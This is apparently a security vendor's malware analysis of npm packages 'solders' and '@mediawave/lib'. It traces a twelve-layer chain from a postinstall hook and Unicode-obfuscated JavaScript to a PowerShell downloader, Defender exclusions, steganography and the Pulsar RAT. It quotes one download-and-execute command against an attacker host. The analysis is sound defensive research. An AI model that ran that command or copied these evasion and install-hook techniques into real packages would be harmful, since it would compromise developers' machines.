Hidden under layers of obfuscation, an npm package delivers a remote access tool. Application Security for the AI Era
In the ever-vigilant effort to secure the open-source ecosystem, Veracode’s continuous monitoring systems recently flagged a pair of npm malware packages—solders and @mediawave/lib. The malicious behavior, however, is not at all obvious at first because of a layer of unusual Unicode obfuscation that caught our attention. Our investigation focused on the solders package, which leverages a common yet critical attack vector: a postinstall script in its package.json. This hook means that simply installing the package is enough to trigger its hidden malicious payload.
Upon inspection, the target lib.js file presented itself not as typical code, but as a dizzying wall of Unicode characters, predominantly Japanese Katakana and Hiragana. This was far more than simple character substitution; it was the entry point to an extremely layered and complex malicious attack chain. What began as an analysis of a single, clever JavaScript obfuscation technique quickly spiraled into a deep-dive that traversed multiple programming languages, downloader stages, and even steganography. Join us as we peel back each layer of this remarkably elaborate attack, following the trail from a few cryptic symbols all the way down to its final RAT payload.
TL;DR
If you’re just here for the highlights and want to see the full, multi-layered attack chain in a concise format, please scroll down to the “Recap: The Anatomy of a Multi-Layered Attack” section. There, we detail each of the twelve layers we had to unravel to get to the bottom of this threat.
This investigation revealed a remarkably deep and complex attack chain. To fully appreciate the attacker’s efforts to evade detection, here is a step-by-step summary of the layers we unraveled:
Layer 1: NPM postinstall Hook: The attack begins with a standard postinstall script in the package.json file, automatically executing the malware upon installation.
Layer 2: Unicode Obfuscated JavaScript: The initial lib.js payload is obfuscated using Japanese Hiragana and Katakana characters as variable names, making static analysis nearly impossible at a glance.
Layer 3: Dynamically Reconstructed JavaScript: This Unicode script is not a direct payload, but a program designed to dynamically build primitives (e.g., ‘t’, ‘r’, ‘u’, ‘e’) and reconstruct the Function constructor from scratch.
Layer 4: Second-Stage Obfuscated JavaScript: The Unicode layer dynamically assembles and executes a second, more traditionally obfuscated JavaScript payload that uses array shuffling and hex encoding.
Layer 5: PowerShell Downloader: Once deobfuscated, the JavaScript’s sole purpose is to execute a short PowerShell command (iwr firewall[.]tel | iex) to download and execute the next stage from a remote server.
Layer 6: Binary-Encoded PowerShell Script: The script hosted at firewall[.]tel is itself obfuscated, with the payload encoded as arrays of binary strings that are converted to ASCII characters and executed.
Layer 7: Base64-Encoded PowerShell Script: Deobfuscating the binary strings reveals another PowerShell script. This one uses Base64 encoding to hide its commands which include adding Windows Defender exclusions and downloading a malicious batch file.
Layer 8: Obfuscated Batch File: The downloaded output.bat (nearly 1MB in size) uses extensive obfuscation, setting hundreds of random environment variables and then concatenating them in a specific order.
Layer 9: Encrypted & Compressed .NET DLL: The batch script’s true payload is a Base64-encoded, 3DES-encrypted, and Gzip-compressed .NET DLL, which is reconstructed and loaded directly into memory.
Layer 10: Steganography: This first .NET DLL is not the final payload. It reaches out to a 3MB PNG image file hosted online and uses steganography techniques to extract hidden data from the image.
Layer 11: Second .NET DLL (The RAT): The data extracted from the image is used to build a second .NET DLL in memory.
Layer 12: Final Payload Deployment: This final DLL is the Pulsar RAT, a remote administration tool that gives the attacker full control over the victim’s machine.
